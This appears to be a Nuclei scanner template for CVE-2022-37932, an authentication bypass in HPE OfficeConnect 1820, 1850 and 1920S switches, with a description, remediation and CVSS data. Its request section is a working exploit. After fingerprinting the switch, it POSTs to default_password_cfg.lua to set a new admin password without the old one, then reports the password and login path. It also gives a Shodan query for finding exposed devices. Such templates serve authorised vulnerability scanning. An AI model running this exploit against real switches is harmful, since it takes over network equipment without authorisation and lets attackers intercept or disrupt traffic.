id: CVE-2022-37932

info:
  name: HP Switch - Authentication Bypass
  author: Phulelouch
  severity: high
  description: |
    A potential security vulnerability has been identified in Hewlett Packard Enterprise OfficeConnect 1820, 1850, and 1920S Network switches. The vulnerability could be remotely exploited to allow authentication bypass. HPE has made the following software updates to resolve the vulnerability in Hewlett Packard Enterprise OfficeConnect 1820, 1850 and 1920S Network switches versions- Prior to PT.02.14; Prior to PC.01.22; Prior to PO.01.21; Prior to PD.02.22;
  impact: |
    Attackers on the adjacent network can bypass authentication on HP OfficeConnect switches without credentials, potentially gaining administrative access to modify switch configurations, intercept network traffic, or disrupt network operations.
  remediation: |
    Update to HPE OfficeConnect switch firmware version PT.02.14 or later for 1820 series, PC.01.22 or later for 1850 series, or PO.01.21/PD.02.22 or later for 1920S series.
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-37932
    epss-score: 0.36699
    epss-percentile: 0.9725
    cpe: cpe:2.3:o:hpe:officeconnect_1820_j9979a_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: hpe
    product: officeconnect_1820_j9979a_firmware
    shodan-query: html:"HPE OfficeConnect"
  tags: cve,cve2022,hp,officeconnect,auth-bypass,intrusive,vkev,vuln

variables:
  password: "{{rand_base(8)}}"

flow: http(1) && (http(2) || http(3))

http:
  - method: GET
    path:
      - "{{BaseURL}}/"

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'HPE OfficeConnect Switch 1920')"
        condition: and
        internal: true

  - raw:
      - |
        POST /login/default_password_cfg.lua HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin&oldPwd=&newPwd={{password}}&confirmPwd={{password}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "redirect")'
          - 'contains(content_type, "application/json")'
        condition: and

    extractors:
      - type: json
        name: redirect
        part: body
        json:
          - .redirect
        internal: true

      - type: dsl
        dsl:
          - '"Password:"+ password'
          - '"Login Path:"+ redirect'

  - raw:
      - |
        POST /htdocs/login/default_password_cfg.lua HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin&oldPwd=&newPwd={{password}}&confirmPwd={{password}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "redirect")'
          - 'contains(content_type, "application/json")'
        condition: and

    extractors:
      - type: json
        name: redirect
        part: body
        json:
          - .redirect
        internal: true

      - type: dsl
        dsl:
          - '"Password:"+ password'
          - '"Login Path:"+ redirect'
# digest: 4b0a00483046022100c5a47e2118e21d62c18b4f8d3b2872275b9f33db1d5b00237197633a53da307d022100b5d5baa5e8a837c1663b12d728d1c3d3e3bc567b7c1c88ccc07f81f6dfffd741:922c64590222798bb761d5b6d8e72950